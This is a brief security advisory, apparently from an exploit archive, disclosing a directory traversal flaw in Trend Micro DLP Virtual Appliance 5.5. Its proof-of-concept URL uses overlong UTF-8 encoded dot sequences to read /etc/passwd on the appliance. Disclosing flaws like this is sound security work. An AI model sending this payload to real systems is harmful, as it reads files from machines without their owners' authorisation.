18 lines
No EOL
859 B
Text
18 lines
No EOL
859 B
Text
Software: Trend Micro Data Loss Prevention Virtual Appliance 5.5
|
|
Vulnerability: Directory Traversal
|
|
Threat Level: Serious (5/5)
|
|
Download: http://support.trendmicro.com.cn/TM- Product/Product/DLP/5.5/Manager/5.5_GM/DLPVA- 5.5.1294-i386-DVD.iso
|
|
Discovery Date: 27/05/2011
|
|
Remote: Yes
|
|
|
|
Author Site Email: Luis Martinez, Sergio Lopez,White Hat Consultores
|
|
http://whitehatconsultores.com/ Sergio López <sergio.sh at gmail.com> Luis Martínez <luismtzsilva at gmail.com>
|
|
|
|
Description:
|
|
A directory traversal vulnerability, can be exploited to read files outside of the web root.
|
|
|
|
PoC Exploit:
|
|
https://IP:8443/dsc//%c0%ae%c0%ae/%c0%ae%c0%ae/%c 0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%a e%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c 0%ae/%c0%ae%c0%ae/etc/passwd
|
|
|
|
PDF Advisory:
|
|
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17388.pdf |